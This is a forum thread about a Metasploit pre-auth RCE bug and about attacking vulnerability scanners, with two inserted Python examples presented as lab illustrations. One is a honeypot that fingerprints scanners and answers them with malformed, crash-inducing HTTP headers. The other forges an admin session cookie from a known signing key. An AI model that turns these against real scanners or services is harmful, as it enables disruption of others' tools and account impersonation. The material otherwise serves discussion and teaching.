This is hardly the first time; Acunetix still has a few vulnerabilities which you can exploit by configuring your website to respond with a specific header to the scan.
SANS' GUI version of SleuthKit was vulnerable to HPP which could lead to persistent XSS/RCE.
Overall it's highly likely that most if not all security testing tools are vulnerable to some attacks, and I have a pretty strong suspicion that governments do work on movie-like "counter hacks" by identifying RCE vulnerabilities in common network/port scanners, vulnerability scanners, and other enumeration tools.
I don't know about governments, but I remember netmon for Windows was susceptible to exposing the kernel. A coworker had to run netmon for analysis of network traffic for some application, and he forgot to isolate his network. Within a day someone on the corporate network had hacked his Windows computer, crashed netmon, downloaded all his data and destroyed the Windows installation and data.
Since I am not familiar with this, I'm very curious to know if something like that is possible and has ever been done before? As in counter-hacking a vulnerability scanner by sending a malformed packet back, or something like that.
In this case, this is a bug in the web interface, so you'd have to be on the same network as this person, or have access to their interface for exploiting this to be practical.
I'm more curious to know if anyone has ever been able to 'counter-hack' a scanner by sending an unexpected response back.
That only works at the "switch" level, mostly; on a modern network you are also likely to trigger on your own switches, since they run in a pseudo-promiscuous mode (usually marketed as IP Helper, Broadcast Helper, Broadcast Redirect, DNS Helper, etc.) to let DNS and other protocols that rely on broadcasts pass through the switch (or VLAN) boundary.
This is however more in relation to intrusion detection not active countermeasures.
I had a PoC honeypot for the Acunetix RCE bug running. It never went beyond crashing the scanner, but it can work.
You can fuzz scanners and then set up honeypots that would exploit any vulnerability you found. Nothing in here is especially complicated; you can also tailor your honeypot to a specific subset of tools you want to target.
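As an added illustration of the honeypot-that-fuzzes-the-scanner idea described above (this is example code written for this page, not the commenter's PoC and not any real exploit): a minimal HTTP honeypot that fingerprints scanners by User-Agent and answers them with deliberately malformed responses, logging the hit so you can see which scanner choked on what. The User-Agent substrings, the mutation list and the hypothetical port are all constructed for the example; it is a lab tool for watching how a scanner's response parser behaves, not a weaponised anything.

```python
# Added example, not from the thread: an "anti-scanner" honeypot that answers
# recognised scanners with reproducible, deliberately hostile HTTP responses.
import random
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed fingerprints: lowercase substring of the User-Agent -> tool label.
# Tailor this to the subset of tools you actually care about.
SCANNER_SIGNATURES = {
    "acunetix": "acunetix",
    "nikto": "nikto",
    "nessus": "nessus",
    "sqlmap": "sqlmap",
}

BODY = b"<html><body>ok</body></html>"


def classify_user_agent(ua):
    """Return the scanner label whose signature appears in the User-Agent, else None."""
    ua_lower = (ua or "").lower()
    for needle, label in SCANNER_SIGNATURES.items():
        if needle in ua_lower:
            return label
    return None


def mutate_headers(seed):
    """Build a list of (name, value) response headers containing one to four
    hostile mutations chosen by a seeded RNG, so a crash can be replayed."""
    rng = random.Random(seed)
    headers = [("Content-Type", "text/html")]
    mutations = [
        # oversized header value: catches fixed-size buffers in the parser
        lambda: [("X-Long", "A" * rng.randint(8192, 65536))],
        # conflicting duplicate headers: parser-differential / pollution territory
        lambda: [("Content-Length", "5"), ("Content-Length", "99999")],
        # format-string-looking bytes in a header the scanner will likely log or render
        lambda: [("Location", "%s%n%x" * rng.randint(1, 8))],
        # control characters a naive header parser may not expect
        lambda: [("X-Ctl", "a\x00b\x07c")],
    ]
    for _ in range(rng.randint(1, 4)):
        headers.extend(rng.choice(mutations)())
    return headers


def build_response(seed):
    """Serialise a raw HTTP/1.1 response (bytes) for the given fuzz seed.
    Built by hand rather than via send_header() so nothing gets sanitised."""
    lines = [b"HTTP/1.1 200 OK"]
    for name, value in mutate_headers(seed):
        lines.append(name.encode("latin-1") + b": " + value.encode("latin-1"))
    lines.append(b"Content-Length: %d" % len(BODY))
    lines.append(b"Connection: close")
    return b"\r\n".join(lines) + b"\r\n\r\n" + BODY


class HoneypotHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        tool = classify_user_agent(self.headers.get("User-Agent", ""))
        if tool is None:
            # Ordinary client: behave like a boring web server.
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"nothing to see here\n")
            return
        seed = random.randrange(1 << 30)
        # Log tool, source and seed: if the scanner dies, replay build_response(seed).
        self.log_message("scanner=%s src=%s fuzz_seed=%d", tool,
                         self.client_address[0], seed)
        self.wfile.write(build_response(seed))
        self.close_connection = True

    do_POST = do_HEAD = do_GET


def serve(port=8080):  # hypothetical port, lab use only
    HTTPServer(("0.0.0.0", port), HoneypotHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

Point the scanner at the honeypot from an isolated lab network and watch the log: a seed that coincides with a scanner crash is your reproducer, and from there it is ordinary crash triage.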
Fun stuff. Serious question though: if you know the cookie signing key, can't you just mint yourself an admin session? Is the YAML vuln required to exploit this issue?
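To make the premise of that question concrete (added example, not from the thread and not Metasploit's actual cookie format): with a purely HMAC-signed session cookie, whoever holds the signing key can mint any session they like, because the verifier only checks that the signature matches. The "payload--hexdigest" layout, SHA-1, the JSON serializer and the demo key are all assumptions made for this illustration; the example deliberately uses JSON so that it stays a signature-forgery demo and does not touch the separate question of what an unsafe deserializer (Marshal, YAML) would add on top.

```python
# Added example, not from the thread: forging an HMAC-signed session cookie when
# the signing key is known. Layout "base64(payload)--hex(hmac-sha1)" is assumed.
import base64
import hashlib
import hmac
import json

# Constructed demo key; in the real scenario this is the leaked signing key.
DEMO_KEY = b"constructed-demo-secret-not-a-real-key"


def sign(payload: bytes, key: bytes) -> str:
    """Serialise a session payload into a signed cookie value."""
    data = base64.b64encode(payload).decode("ascii")
    mac = hmac.new(key, data.encode("ascii"), hashlib.sha1).hexdigest()
    return data + "--" + mac


def verify(cookie: str, key: bytes):
    """Return the decoded session if the signature is valid, else None.
    Note there is nothing here but the MAC check: no server-side session
    table, so a correctly signed cookie is trusted wholesale."""
    data, sep, mac = cookie.rpartition("--")
    if not sep:
        return None
    expected = hmac.new(key, data.encode("ascii"), hashlib.sha1).hexdigest()
    if not hmac.compare_digest(expected, mac):
        return None
    return json.loads(base64.b64decode(data))


def mint_admin_cookie(key: bytes) -> str:
    """What an attacker with the key does: sign a session claiming admin."""
    session = {"user_id": 1, "admin": True}
    return sign(json.dumps(session).encode("utf-8"), key)


if __name__ == "__main__":
    forged = mint_admin_cookie(DEMO_KEY)
    print("forged cookie:", forged)
    print("server accepts it as:", verify(forged, DEMO_KEY))
    print("with the wrong key:", verify(forged, b"some-other-key"))
```

The take-away for the question asked above is that key disclosure alone is enough to impersonate any user of a signature-only cookie store; whether a further deserialization bug is also reachable is a separate matter that this example does not address.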
This is a particularly bad editorialized title, since nobody familiar with Metasploit or tools like it would assume it to be secure code.
The right title is the boring one, "Pre-auth Remote Code Execution Vulnerability in Metasploit".
The rule on HN is, if you want to put your own spin on a story, like "This bug will delight irony lovers everywhere", you put that in a comment like everyone else. Submitters don't own the stories and don't get to editorialize their titles.
> The right title is the boring one, "Pre-auth Remote Code Execution Vulnerability in Metasploit".
That title is plenty interesting to me. If I run a product, I would normally not expect it to have security issues (unless it's from Adobe or something really old). Take Wireshark: I've seen them fix stuff like this so, yeah, I do expect Wireshark to be fine to run on untrusted networks as long as I'm not trying to wiretap the NSA's traffic. Similarly with Metasploit, I expect to be able to run that without being sploited myself.